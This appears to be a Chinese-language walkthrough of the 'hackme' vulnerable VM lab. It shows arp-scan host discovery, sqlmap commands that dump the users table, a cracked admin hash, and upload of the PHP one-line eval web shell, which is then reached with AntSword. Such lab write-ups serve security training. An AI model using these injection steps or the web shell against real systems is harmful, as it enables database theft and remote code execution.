前提:kali和hackme的连接方式都为net模式
将hackme.ova的镜像导入虚拟机中
出现此页面则表示导入成功,打开kali虚拟机终端,切换为root权限
arp-scan -l
遇到一个ip时首先使用御剑扫描后台,这里先保留,后面会用到
浏览器访问此ip
注册账户(admin,123456),登录
没有思路了,输入一个‘1’抓包试试
在‘1’后面加一个‘*’,鼠标右键选择复制到文件,保存到桌面
kali中使用sqlmap工具
sqlmap -r '/home/kali/桌面/1.txt'
发现存在sql注入
爆破库名
sqlmap -r '/home/kali/桌面/1.txt' --dbs
爆破表名
sqlmap -r '/home/kali/桌面/1.txt' -D webapphacking --tables
打印‘users’表
sqlmap -r '/home/kali/桌面/1.txt' -D webapphacking -T users --dump
发现有一个超级管理员用户,密码md5解密
2386acb2cf356944177746fc92523983
利用得到的账号密码再次登录
我们选择一个内容为一句话木马的php文件上传
<?php @eval($_POST[a]);?>
那么怎么查看上传后的文件呢?这时就需要之前御剑扫描到的那几个网址,分别访问试试
http://192.168.164.144/uploads/
就能发现上传后的1.php文件,双击打开,这个就是木马的路径
http://192.168.164.144/uploads/1.php
蚁剑连接